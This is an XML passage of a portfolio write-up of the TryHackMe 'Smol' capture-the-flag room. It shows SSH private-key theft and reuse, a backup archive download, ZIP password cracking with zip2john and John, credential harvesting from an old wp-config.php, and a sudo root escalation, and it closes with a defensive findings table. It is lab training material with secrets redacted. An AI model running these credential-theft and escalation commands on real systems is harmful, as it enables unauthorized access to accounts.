        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 10 — Offline password recovery, result redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The recovered lab credential enables the switch to diego, where the user flag is obtained. The flag string is intentionally hidden in this edition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>su diego</w:t>
        <w:br/>
        <w:t>cat /home/diego/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. SSH Key Pivot to think</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Local enumeration exposes a readable private key in /home/think/.ssh/id_rsa. The key is copied, permissioned correctly, and used for direct SSH access. Private key material is redacted from the portfolio image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cat /home/think/.ssh/id_rsa</w:t>
        <w:br/>
        <w:t>chmod 600 id_rsa</w:t>
        <w:br/>
        <w:t>ssh think@www.smol.thm -i id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1337005"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="11-ssh-key-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1337005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 11 — SSH key pivot, key material redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Historical Backup Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The gege context exposes wordpress.old.zip. The archive is transferred to the attacker host for offline processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python3 -m http.server 8080</w:t>
        <w:br/>
        <w:t># attacker: wget http://www.smol.thm:8080/wordpress.old.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1530706"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="12-backup-transfer.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1530706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 12 — Backup archive transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 ZIP password recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The encrypted archive is converted into a crackable form with zip2john and tested with John the Ripper. The recovered password is not published.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>zip2john wordpress.old.zip &gt; wp_hash.txt</w:t>
        <w:br/>
        <w:t>john wp_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1757477"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="13-backup-crack-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1757477"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 13 — ZIP password recovery, password redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Credential reuse from the old configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The extracted WordPress tree contains an old wp-config.php. Its database settings disclose credentials associated with xavi. This provides the next lateral-movement step without exposing the actual password in the portfolio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>unzip wordpress.old.zip</w:t>
        <w:br/>
        <w:t>cat wordpress.old/wp-config.php</w:t>
        <w:br/>
        <w:t>su xavi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1856689"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="14-xavi-config-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1856689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 14 — Legacy configuration and credential reuse, password redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The final sudo check reports an unrestricted rule for xavi: (ALL : ALL) ALL. This means xavi may execute arbitrary commands as any user, including root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
        <w:br/>
        <w:t>sudo su</w:t>
        <w:br/>
        <w:t># root shell obtained</w:t>
        <w:br/>
        <w:t>cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2929128"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="15-privilege-escalation.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2929128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 15 — Privilege escalation outcome; root flag redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Findings and Defensive Lessons</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>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Pr>
      <w:tblGrid>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Defensive action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>jsmol2wp LFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unsafe file handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Arbitrary file disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Patch/remove plugin; validate paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hidden PHP backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plugin integrity failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Direct command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verify plugin provenance; monitor integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Credential reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Weak secret hygiene</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cross-account pivoting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Use unique credentials and rotate secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Readable SSH key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Permissive file permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authenticated access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Protect .ssh and key files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Legacy backup secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Poor archive lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Credential disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Strong encryption and secure retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unrestricted sudo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Least privilege failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Restrict sudo to necessary commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Smol demonstrates how a seemingly ordinary web finding can become a full system compromise when multiple security controls are weak at the same time. The initial LFI provides visibility, the plugin backdoor provides execution, the local environment supplies reusable credentials and keys, the historical backup provides another trust pivot, and the sudo rule collapses the final privilege boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The portfolio version deliberately removes answer strings while preserving the investigation logic, command structure, evidence, and remediation guidance that matter for demonstrating practical cybersecurity skills.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId2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Smol — TryHackMe CTF Documentation • Portfolio-safe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